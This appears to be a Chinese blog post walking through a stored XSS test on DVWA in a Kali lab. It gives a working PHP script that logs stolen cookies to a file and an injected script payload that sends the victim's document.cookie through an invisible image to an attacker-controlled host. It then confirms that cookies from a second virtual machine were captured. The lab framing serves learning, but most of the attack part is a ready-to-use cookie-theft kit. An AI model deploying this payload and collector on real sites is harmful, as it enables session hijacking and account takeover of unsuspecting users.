首页 > 其他分享 >存储型XSS测试验证

存储型XSS测试验证

时间:2022-10-31 12:48:10浏览次数:67  
标签:XSS 存储 验证 kali www cookie var 服务器

1.准备接受cookie的服务器

服务器启动apache 

root@kali:~# systemctl start apache2

/var/www/html/下创建一个文件cookie_rec.php

root@kali:~# vim /var/www/html/cookie_rec.php

<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt","a");
fwrite($log, $cookie . "\n");
fclose($log);
?>

修改文件夹权限,一会要生成txt文件

root@kali:/var# chown -R www-data.www-data /var/www/

2.

植入XSS代码:

 <script>document.write('<img src="http://192.168.204.132/cookie_rec.php?cookie='+document.cookie+'" width=0 height=0 >')</script>

 

 

在页面上加载一个看不见的图片,把cookie获取到传给接受cookie的服务器,参数传给接收服务器的cookie_rec.php,会生成一个保存cookie的文件

 

3.通过另一个windows虚拟机,登录dvwa,然后点击存储型的页面,用户感知不到,也看不见图片

 

 

此时查看接受服务器上,已经生成了保存cookie的文件

 

标签:XSS,存储,验证,kali,www,cookie,var,服务器
From: https://www.cnblogs.com/yitian395/p/16843852.html

相关文章

  • 虚拟存储器
    第六周虚拟存储器第六周虚拟存储器引言第1讲 分页存储管理的基本概念第2讲 虚拟存储器及虚拟地址空间第3讲 分页存储管理的实现第4讲 存储器层次结构及其访......
  • 新建存储过程为什么要加delimiter $$
    SQL中,delimiter命令的作用是定义sql语句的分隔符sql中默认的语句分隔符是分号(分号后面的当成下一条语句)写存储过程或函数等语句块时,中间会包含分号,所以语句块不能成为一......
  • 构造XSS脚本
    弹窗警告<script>alert('xss')</script><script>alert(document.cookie)</script>页面嵌套<iframesrc=http://www.baidu.comwidth=300height=300></iframe><iframesr......
  • 验证码漏洞
    验证码漏洞分类图片验证码通过在图片上随机产生数字、英文字母、汉字或者问题进行验证。伴随OCR技术的发展,能够轻易被破解手机短信验证码可以比较准确和安全地保......
  • Dreamweaver网页作业——紫罗兰永恒花园动漫价绍网页 7页,含有table表格,js表单验证还有
    HTML实例网页代码,本实例适合于初学HTML的同学。该实例里面有设置了css的样式设置,有div的样式格局,这个实例比较全面,有助于同学的学习,本文将介绍如何通过从头开始设计个人......
  • 【WPF】二、Validation 数据验证
    上一篇:【WPF】一、WPF数据验证机制Validation---重要只设计Mvvm的View层和Viewmodel层,未设计到model。下面一篇重点介绍IDataErrorInfo|INOtyfyDataErrorInfo+数据标注......
  • js滑动验证
    <!DOCTYPEhtml><htmllang="en"><head><metacharset="UTF-8"><metahttp-equiv="X-UA-Compatible"content="IE=edge"><metaname="viewport"content......
  • Python接入微信公众号Token验证
    注意点官方示例是Pthon2版本的,如果是Python3版本需要有改动验证成功返回echostr要是数字格式的公众号侧配置(公众号后台-基本配置)服务器侧配置代码部分......
  • 数据验证
    日常项目开发中,对于前端提交的表单I后台接口接收到表单数据后,为了程序的严谨性,通常后端会加入业务参数的合法校验操作来避免程序的非技术性bug,这里对于客户端提交的数据......
  • C语言之存储类,枚举,结构体,共用体,typedef
    目录1存储类1.1auto存储类1.2register存储类1.3static存储类1.4extern存储类2枚举2.1定义2.2操作枚举2.2.1用for循环遍历枚举3结构体3.1定义结构3.2操作结构......